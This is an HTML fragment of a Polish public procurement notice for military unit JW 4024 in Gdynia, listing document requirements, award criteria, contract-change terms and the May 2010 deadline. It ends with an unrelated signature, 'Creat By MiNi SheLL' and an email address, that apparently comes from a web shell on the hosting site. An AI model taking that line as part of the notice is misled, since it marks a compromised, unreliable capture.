<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>nie należy przedkładać oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje między innymi możliwości dokonywania zmian w umowie ( na podst. Art. 144 ust.1 Pzp.) dotyczącej wartości zamówienia:
a)	 spowodowana zmianami  organizacyjno-etatowymi w jednostce Zamawiającego (likwidacja lub zwiększenie ilości posterunków, likwidacja kompleksu lub przekazanie kompleksu innemu użytkownikowi)
b)   po wprowadzeniu stanu wojennego lub w czasie wojny w trybie szczegółowo uzgodnionym z Wykonawcą  przekazanie ochrony obiektów I i II  warcie wojskowej Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mw.ml.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA Nr 4024
ul. Strażacka 2-8
81-301 Gdynia 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2010 godzina 12:00, miejsce: JEDNOSTKA WOJSKOWA 4024 - Kancelaria (budynek sztabu JW 4024 - II piętro)
ul. Strażacka 2-8
81-301 Gdynia 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com